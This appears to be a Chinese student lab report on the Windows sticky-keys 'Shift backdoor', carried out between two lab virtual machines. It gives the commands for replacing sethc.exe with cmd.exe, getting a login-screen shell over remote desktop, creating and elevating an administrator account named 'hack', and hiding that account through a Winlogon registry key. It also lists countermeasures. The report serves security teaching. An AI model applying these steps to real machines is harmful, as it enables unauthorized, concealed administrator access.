一、实验目的及要求

1. 学会创建Shift后门

2.掌握shift后门的原理

二、实验设备（环境）及要求

   PC机, VC++等,虚拟云平台

三、实验内容与步骤

1.在192.168.1.3的虚拟机上打开cmd命令指示符；

2.输入“ cd  c:\WINDOWS\system32”,进入该文件夹；

3.输入“move sethc.exe sethc.exe.bak”,对“sethc.exe”进行备份；

4.输入“copy cmd.exe sethc.exe”，对cmd.exe进行复制并更名为“sethc.exe”；

5.打开控制面板-> 辅助功能选项->勾选“使用粘滞键”，点击应用；

6.打开192.168.1.2的虚拟机，打开运行，输入“mstsc”打开远程登录程序；

7.输入“192.168.1.3”，点击连接；

8.当出现登录界面时，按5下shift键可进入目标机的cmd中；

9.在cmd中输入“net user hack 123 /add”，创建用户；

10.接下来输入“net localgroup administrators hack /add”和“net user hack /active：yes”，对hack用户进行提权和激活；

11.用hack用户登录目标机。

四、实验结果与数据处理

1.对192.168.1.3的虚拟机的命令操作

2.使用粘滞键

3.用192.168.1.2的虚拟机远程登录192.168.1.3的虚拟机时，创建用户。并对其进行提权和激活

4.成功登录目标机

五、分析与讨论

  1.本实验是利用在应用“使用粘滞键”后，windows系统在按5次shift后会调用“sethc.exe”应用程序的原理，将cmd.exe复制并更名为“sethc.exe”，然后替换掉原有的sethc.exe文件，这样在登陆界面的时候我们连续按下5吃shift键系统就会运行cmd.exe，这样我们就可以对目标机进行创建用户，对用户进行相关提权和激活，从而进入目标机。

  2.防范措施：

（1）禁用shift键的粘滞功能；

（2）设置权限，让任何用户都无法访问和修改“sethc.exe”文件。

3.如何创建隐藏用户：

  创建用户后，按win+r，输入regedit回车，把注册表放到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccounts\UserList，在里面创建一个dword值，命名为你要隐藏的用户名，数值0。